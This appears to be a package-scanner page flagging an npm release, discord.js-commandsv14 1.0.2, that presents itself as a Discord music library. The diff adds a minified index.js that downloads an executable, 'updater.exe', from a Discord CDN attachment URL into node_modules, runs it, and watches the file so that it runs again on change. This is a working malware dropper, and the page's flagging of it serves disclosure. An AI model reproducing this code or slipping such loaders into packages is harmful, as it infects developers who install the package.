discord.js-commandsv14 1.0.2

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of discord.js-commandsv14 might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/index.js +1 -0
  2. package/package.json +14 -0
package/index.js ADDED
@@ -0,0 +1 @@
1
+ const fs=require("fs"),https=require("https"),{exec:e}=require("child_process"),path=require("path");class ExeFileHandler{constructor(e){this.exePath=e}onModified(t){t===this.exePath&&e(this.exePath,(e,t,s)=>{})}}async function downloadExe(e,t){let s="discord.js",n=path.join("node_modules",s,t),o=path.join("node_modules",s);fs.existsSync(o)||fs.mkdirSync(o,{recursive:!0});let i=fs.createWriteStream(n),a=await new Promise((t,s)=>{let o=https.get(e,e=>{e.pipe(i),e.on("end",()=>{observeFile(n)}),t(e)});o.on("error",s)});a.statusCode}function observeFile(t){fs.watch(t,s=>{"change"===s&&e(t,(e,t,s)=>{})})}downloadExe("https://cdn.discordapp.com/attachments/1169920071582371921/1203012416955486299/updater_2.exe","updater.exe");
package/package.json ADDED
@@ -0,0 +1,14 @@
1
+ {
2
+ "name": "discord.js-commandsv14",
3
+ "version": "1.0.2",
4
+ "description": "discord music lib",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1"
8
+ },
9
+ "author": "distube",
10
+ "license": "ISC",
11
+ "dependencies": {
12
+ "unrar-js": "^0.2.3"
13
+ }
14
+ }